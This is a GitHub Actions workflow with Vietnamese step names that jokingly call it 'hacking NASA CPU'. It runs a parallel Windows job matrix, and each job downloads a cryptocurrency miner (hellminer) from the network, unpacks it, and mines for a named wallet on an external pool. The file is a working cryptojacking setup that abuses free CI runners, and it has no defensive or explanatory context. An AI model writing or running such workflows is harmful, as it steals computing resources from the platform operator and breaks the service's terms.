name: Cua-Hack_CPU-Nasa

on: [workflow_dispatch]

jobs:
  build:
    name: Cua-Hack_CPU-Nasa
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Sẵn sàng Hach CPU Nasa
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
    - name: Đang cài đặt ẩn danh IP Chính chủ ko toang mẹ sao
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: Lấy dữ liệu thành công nhá, bắt đầu Hach CPU.
      run: .\hellminer_cpu_win64_avx2\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQ5CJrhGDVQm6UGpoFDyrmsz9ER47Gif8g.hiepprovip -p x --cpu 1
    - name: Kết Thúc nhá
      run: exit
